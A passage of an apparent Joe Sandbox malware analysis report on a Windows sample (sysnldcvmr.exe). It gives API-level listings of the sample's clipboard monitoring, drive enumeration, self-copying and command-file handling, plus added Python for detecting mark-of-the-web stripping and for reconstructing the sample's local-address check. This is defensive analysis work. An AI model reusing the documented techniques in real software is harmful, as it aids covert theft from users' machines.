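        pid, op, target = ev["pid"], ev["op"], ev["target"]
        if op == "file_create" and TEMP_DROP.search(target):
            created.add((pid, target.lower()))
        elif op == "stream_delete":
            m = ZONE_ID.match(target)
            if m and (pid, m.group(1).lower()) in created:
                hits.append((pid, m.group(1)))
    return hits


# Constructed telemetry: one malicious sequence, one benign download left with its MOTW,
# and one stream deletion on a file the deleting process never wrote.
SAMPLE_EVENTS = [
    {"pid": 4, "op": "file_create",   "target": r"C:\Users\user\AppData\Local\Temp\4128719.exe"},
    {"pid": 4, "op": "stream_delete", "target": r"C:\Users\user\AppData\Local\Temp\4128719.exe:Zone.Identifier"},
    {"pid": 9, "op": "file_create",   "target": r"C:\Users\user\AppData\Local\Temp\setup.exe"},
    {"pid": 7, "op": "stream_delete", "target": r"C:\Users\user\Downloads\report.pdf:Zone.Identifier"},
]


def demo() -> List[Tuple[int, str]]:
    return find_motw_strip(SAMPLE_EVENTS)
```

Keying on the creating process matters: unzip tools and browsers also touch Zone.Identifier streams, but they rarely write an all-digit .exe into Temp and then strip the stream from it themselves.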

                                                                    Control-flow Graph

                                                                    Control-flow graph (rendered as an image in the original report; executed and not-executed blocks were colour-coded): entry block 40aea0 calls 40add0 (the gethostname/gethostbyname lookup). Blocks 40aebe..40aff7 form a chain of one strcmp and eight strstr tests, each made through 40aa20, and one branch of every test goes straight to the exit block at 40b145. The path that passes all tests enters a critical section at 40affe, loops over 40d4a0 in 40b01f..40b057, then calls 40b150, 409d90 and 40d4a0 again, optionally sleeps in the 40b0c6..40b0ce loop, calls 40a1b0, 40b150 and 40ab80, leaves the critical section at 40b13a and returns at 40b145.
                                                                    APIs
                                                                      • Part of subcall function 0040ADD0: gethostname.WS2_32(?,00000100), ref: 0040ADEC
                                                                      • Part of subcall function 0040ADD0: gethostbyname.WS2_32(?), ref: 0040ADFE
                                                                    • strcmp.NTDLL ref: 0040AED0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: gethostbynamegethostnamestrcmp
                                                                    • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                    • API String ID: 2906596889-2213908610
                                                                    • Opcode ID: c5830f0f9c36f6cf05290b869868c0dc91983b72ef23a24c3b2e675c34fe0909
                                                                    • Instruction ID: 458019ee7e4258451e0266341ac37eb9dcc64f8272ac2f4812142232ba39784f
                                                                    • Opcode Fuzzy Hash: c5830f0f9c36f6cf05290b869868c0dc91983b72ef23a24c3b2e675c34fe0909
                                                                    • Instruction Fuzzy Hash: 406162B4A00305BBDF00EF65EC56BAA37659B10348F14847EE8496A3C1E73DE964C79E
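Two routines in this report work out the host's own address: the function at 0040AAAD opens a TCP connection to www.update.microsoft.com on port 80 (htons(0x50)) and reads back getsockname(), which yields the interface IP the machine actually routes through, and the function at 0040AEA0 resolves gethostname() and runs the result through strcmp/strstr against the strings "0.0.0.0", "10.", "127.", "192.", ".10.", ".127." and ".192.". The Python below is an added example serving both passages, not code from the sample or from Joe Sandbox. The prefix test is a reconstruction from the string list (the test order and what the sample does on a match are not visible in the report), and the connectivity probe is run against a loopback listener so it works offline; ipaddress is used alongside to show where plain string matching over- and under-reaches.

```python
"""Local-address discovery (connect + getsockname) and the sample's address-prefix test.

Added example, not code from the sample or from Joe Sandbox.
Assumptions: SAMPLE_PREFIXES/SAMPLE_SUBSTRINGS reconstruct the strstr/strcmp
chain from the report's string list; the loopback listener stands in for
www.update.microsoft.com:80 so the demo runs offline.
"""
import ipaddress
import socket
import threading
from typing import List, Tuple

SAMPLE_PREFIXES = ("0.0.0.0", "10.", "127.", "192.")
SAMPLE_SUBSTRINGS = (".10.", ".127.", ".192.")


def sample_looks_local(addr: str) -> bool:
    """Reconstruction of the sample's heuristic: pure string tests, no address parsing."""
    return addr.startswith(SAMPLE_PREFIXES) or any(s in addr for s in SAMPLE_SUBSTRINGS)


def is_actually_private(addr: str) -> bool:
    """What the heuristic approximates, done with real parsing (RFC 1918, loopback, unspecified)."""
    ip = ipaddress.ip_address(addr)
    return ip.is_private or ip.is_loopback or ip.is_unspecified


def classify(addrs: List[str]) -> List[Tuple[str, bool, bool]]:
    """(address, sample's verdict, correct verdict) for each address."""
    return [(a, sample_looks_local(a), is_actually_private(a)) for a in addrs]


def outbound_address(host: str, port: int, timeout: float = 2.0) -> str:
    """connect() then getsockname(): the local IP chosen for that route,
    which is exactly what the getsockname() call in 0040AAAD returns."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.getsockname()[0]


def demo_outbound() -> str:
    """Offline stand-in for the www.update.microsoft.com:80 probe using a loopback listener."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def accept_once() -> None:
        conn, _ = srv.accept()
        conn.close()

    t = threading.Thread(target=accept_once, daemon=True)
    t.start()
    try:
        return outbound_address("127.0.0.1", port)
    finally:
        t.join(timeout=2)
        srv.close()
```

The classify() rows show the heuristic's edges: a public address that merely starts with "192." or contains ".10." is treated as local, while an RFC 1918 172.16/12 address is not matched at all. For network detection, the useful signal from 0040AAAD is a raw TCP/80 connection to www.update.microsoft.com (preceded by a DNS lookup) from a process that is not a browser or the Windows Update client.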

                                                                    Control-flow Graph

                                                                    Control-flow graph (rendered as an image in the original report; executed and not-executed blocks were colour-coded): a window procedure starting at 405970 with GetWindowLongW, dispatching on the message: 4059c4 registers the window with SetClipboardViewer and stores state via SetWindowLongW; 4059ee SetWindowLongW and 405a0c SendMessageA; 405a27..405a62 performs three IsClipboardFormatAvailable checks, after which 405a75 OpenClipboard, 405a85 GetClipboardData and 405a9d GlobalLock read the clipboard, one of 405690, 4057b0 or 405570 processes the content, 405b11 does GlobalUnlock and CloseClipboard, optionally followed by 404970 and 40a1b0; 405b45 SendMessageA; 405b5d registers raw input devices with RegisterRawInputDevices and unhooks with ChangeClipboardChain. Every path ends in DefWindowProcA at 405ba4.
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040597C
                                                                    • SetClipboardViewer.USER32(?), ref: 004059C8
                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 004059DB
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A30
                                                                    • OpenClipboard.USER32(00000000), ref: 00405A77
                                                                    • GetClipboardData.USER32(00000000), ref: 00405A89
                                                                    • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B90
                                                                    • ChangeClipboardChain.USER32(?,?), ref: 00405B9E
                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 00405BB4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                    • String ID:
                                                                    • API String ID: 3549449529-0
                                                                    • Opcode ID: 49ecf4cbec24bbc80f079b1b2f1b6d88094832ae9fccf906fc95d8e2fe17205b
                                                                    • Instruction ID: 2c6a07511b676f4089081adff438ee2b95572153aa6d486a7a165f398962c3b3
                                                                    • Opcode Fuzzy Hash: 49ecf4cbec24bbc80f079b1b2f1b6d88094832ae9fccf906fc95d8e2fe17205b
                                                                    • Instruction Fuzzy Hash: 9A711A74A00608EBDF14DFA4D988BAF77B4EF48301F14852AE505B6290D779AA80CF69

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNEL32(000003E8), ref: 00406BCE
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysnldcvmr.exe,00000104), ref: 00406BE0
                                                                      • Part of subcall function 0040E770: CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                      • Part of subcall function 0040E770: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                      • Part of subcall function 0040E770: CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                    • ExitThread.KERNEL32 ref: 00406D4A
                                                                      • Part of subcall function 004063A0: GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                      • Part of subcall function 004063A0: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                      • Part of subcall function 004063A0: RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                      • Part of subcall function 004063A0: RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                    • Sleep.KERNEL32(00000BB8), ref: 00406D3D
                                                                      • Part of subcall function 004062C0: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C7F
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C94
                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406CAF
                                                                    • wsprintfW.USER32 ref: 00406CC2
                                                                    • wsprintfW.USER32 ref: 00406CE2
                                                                    • wsprintfW.USER32 ref: 00406D05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                    • String ID: (%dGB)$%s%s$C:\Windows\sysnldcvmr.exe$Unnamed volume
                                                                    • API String ID: 1650488544-3455140397
                                                                    • Opcode ID: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                    • Instruction ID: f0476b63a1379e6dca01d87e2afc3553bbde202c422fcd3a3a6a752a7ad43008
                                                                    • Opcode Fuzzy Hash: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                    • Instruction Fuzzy Hash: 53418471900318ABEB14DB94DD45FEE7778BB44700F1045A9F20AA51D0DB785B94CF6A

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.NTDLL ref: 00405898
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058B0
                                                                    • Sleep.KERNEL32(00000001), ref: 004058C4
                                                                    • GetTickCount.KERNEL32 ref: 004058CA
                                                                    • GetTickCount.KERNEL32 ref: 004058D3
                                                                    • wsprintfW.USER32 ref: 004058E6
                                                                    • RegisterClassExW.USER32(00000030), ref: 004058F3
                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040591C
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405937
                                                                    • TranslateMessage.USER32(?), ref: 00405945
                                                                    • DispatchMessageA.USER32(?), ref: 0040594F
                                                                    • ExitThread.KERNEL32 ref: 00405961
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                    • String ID: %x%X$0
                                                                    • API String ID: 716646876-225668902
                                                                    • Opcode ID: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                    • Instruction ID: 85e967beda8c0998690da8d5d0b59a8f0be79fc45de23a81cc248e6733ffc6a2
                                                                    • Opcode Fuzzy Hash: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                    • Instruction Fuzzy Hash: DB211DB1940308BBEB10ABA0DC49FEE7B78EB04711F10812AF601BA1D0DBB99545CF68

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F2
                                                                    • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040E813
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040E832
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E84B
                                                                    • memcmp.NTDLL ref: 0040E8DD
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E900
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E90A
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E914
                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040E933
                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E958
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E962
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                    • String ID: .Mw
                                                                    • API String ID: 3902698870-2453323595
                                                                    • Opcode ID: 3dd30dc439ad3f7a5ebd7dce9fe05c3210832a6c06382493a81f5afd8b17f853
                                                                    • Instruction ID: 0da617c1af0bd4dbc976a582f880bbe3058530cb6ade4bb6176e088db5cb8200
                                                                    • Opcode Fuzzy Hash: 3dd30dc439ad3f7a5ebd7dce9fe05c3210832a6c06382493a81f5afd8b17f853
                                                                    • Instruction Fuzzy Hash: D3516DB5E00308FBDB14DBA4CC49BEEB774AB48304F108569F611BB2C1D7B9AA40CB58

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(00416690,?,?,?,?,?,?,00407A56), ref: 0040B2CB
                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B31D
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B33E
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B35D
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B372
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B3D8
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B3E2
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040B3EC
                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                    • String ID: C:\Users\user\tbtnds.dat$Vz@$.Mw
                                                                    • API String ID: 439099756-284525557
                                                                    • Opcode ID: b646a7b07f4a3dc35abcfcdb9ddb4a95ecf8a323ec4e95c146113b602af952b7
                                                                    • Instruction ID: 3b431581fb8605495e02e5545908ab4f756817927d1539066ca4ce1953719e7c
                                                                    • Opcode Fuzzy Hash: b646a7b07f4a3dc35abcfcdb9ddb4a95ecf8a323ec4e95c146113b602af952b7
                                                                    • Instruction Fuzzy Hash: 91411C74E40309EBDB10DFA4DC4ABAEB774EB44704F208569EA11BA2C1C7B96541CB9D

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(00415E30,?,?,?,?,?,00407A20), ref: 00405BCB
                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407A20), ref: 00405BE5
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C06
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C25
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C3E
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00405CCB
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405CD5
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00405CDF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                    • String ID: C:\Users\user\tbtcmds.dat$.Mw
                                                                    • API String ID: 3956458805-796022103
                                                                    • Opcode ID: 7cb746dfae3c77901cbfeb316d20c0ef760ad0ada3adb76a8fe376954cbd565b
                                                                    • Instruction ID: 44e1aa5071e985e1939c8a19f3b292d5e35966d71e561f6040ad28af9ac572d1
                                                                    • Opcode Fuzzy Hash: 7cb746dfae3c77901cbfeb316d20c0ef760ad0ada3adb76a8fe376954cbd565b
                                                                    • Instruction Fuzzy Hash: 4B31FD74E44309EBEB14DBA4CD49BAFBB74EB48700F208569E601772C0D7B96941CF99

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.NTDLL ref: 0040E98E
                                                                    • memset.NTDLL ref: 0040E99E
                                                                    • CreateProcessW.KERNEL32(00000000,Gy@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040E9D7
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040E9E7
                                                                    • ShellExecuteW.SHELL32(00000000,open,Gy@,00000000,00000000,00000000), ref: 0040EA02
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EA1C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                    • String ID: $D$Gy@$open
                                                                    • API String ID: 3787208655-4184347819
                                                                    • Opcode ID: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                    • Instruction ID: afb7e97e53159593a654a1f5a0506a904f07d925a59540ad2b26a1d3cea08ed0
                                                                    • Opcode Fuzzy Hash: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                    • Instruction Fuzzy Hash: 08114271A90308BBE710DB91CD46FDE7774AB04B00F200129F6087E2C1D6F9AA54CB59

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2D6
                                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,020D0638,000000FF), ref: 0040D2DD
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2E8
                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,020D0638,000000FF), ref: 0040D2EF
                                                                    • InterlockedExchangeAdd.KERNEL32(00407AD2,00000000), ref: 0040D312
                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D347
                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D392
                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D3AE
                                                                    • Sleep.KERNEL32(00000001), ref: 0040D3DE
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D3ED
                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2), ref: 0040D3F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                    • String ID:
                                                                    • API String ID: 3862671961-0
                                                                    • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                    • Instruction ID: a8d0ef9cc0f8c3f9fe641a145e15df681aa384361be6a62e8494921e8eef4e23
                                                                    • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                    • Instruction Fuzzy Hash: 0A411A74D00209EFDB04DFE4D888BAEBB71EB44315F14816AE916A7380D7789A85CF5A

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 365 406060-40608a EnterCriticalSection call 40c880 368 406090-4060a3 call 40c820 365->368 369 4062a3-4062b4 LeaveCriticalSection 365->369 368->369 372 4060a9-4060b8 368->372 373 4060c3-4060cc 372->373 374 4060d2-4060f0 373->374 375 4061c6-4061cc 373->375 378 4060f2 374->378 379 4060f4-4061bf memcpy call 40a1b0 call 40a220 call 40a1b0 call 40c190 call 407310 374->379 376 4061f9-40620b call 40a1b0 375->376 377 4061ce-4061dc call 405cf0 375->377 376->369 388 406211-406232 CreateFileW 376->388 384 4061e1-4061e9 377->384 378->373 379->375 384->376 387 4061eb-4061f5 384->387 387->376 388->369 390 406234-40623b 388->390 392 406246-40624f 390->392 395 406251-40628d WriteFile 392->395 396 40628f-40629c FlushFileBuffers 392->396 398 40623d-406243 395->398 396->369 398->392
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00415E30,00000000,0040B8F2,006A0266,?,0040B90E,00000000,0040CBEC,?), ref: 0040606F
                                                                    • memcpy.NTDLL(?,00000000,00000100), ref: 00406101
                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406225
                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406287
                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 00406293
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040629D
                                                                    • LeaveCriticalSection.KERNEL32(00415E30,?,?,?,?,?,?,0040B90E,00000000,0040CBEC,?), ref: 004062A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                    • String ID: C:\Users\user\tbtcmds.dat$.Mw
                                                                    • API String ID: 1457358591-796022103
                                                                    • Opcode ID: c2df7c7b077ac60798c6fa4429fae4edc702456a9307d602ca0cebd3616530a6
                                                                    • Instruction ID: bb102638da67a563b53aa46b2a5b6ce2f3b38349fb156310049a7a66f3822ae6
                                                                    • Opcode Fuzzy Hash: c2df7c7b077ac60798c6fa4429fae4edc702456a9307d602ca0cebd3616530a6
                                                                    • Instruction Fuzzy Hash: 1D71DEB5E002099BCB04DF94D981FEFB7B1BB88304F14816DE505BB382D779A951CBA5

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 420 40ab80-40ab8d 421 40ab94-40abb2 call 409fa0 420->421 422 40ab8f 420->422 423 40ac6c-40ac6f 421->423 426 40abb8-40abbf 421->426 422->423 427 40abca-40abd3 426->427 428 40ac04-40ac25 CreateFileW 427->428 429 40abd5-40ac02 427->429 431 40ac53-40ac69 InterlockedExchange call 40a1b0 428->431 432 40ac27-40ac4c WriteFile FlushFileBuffers 428->432 429->427 431->423 432->431
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AC18
                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AC39
                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 0040AC43
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040AC4D
                                                                    • InterlockedExchange.KERNEL32(00415260,0000003D), ref: 0040AC5A
                                                                    Strings
                                                                    Memory Dump Source
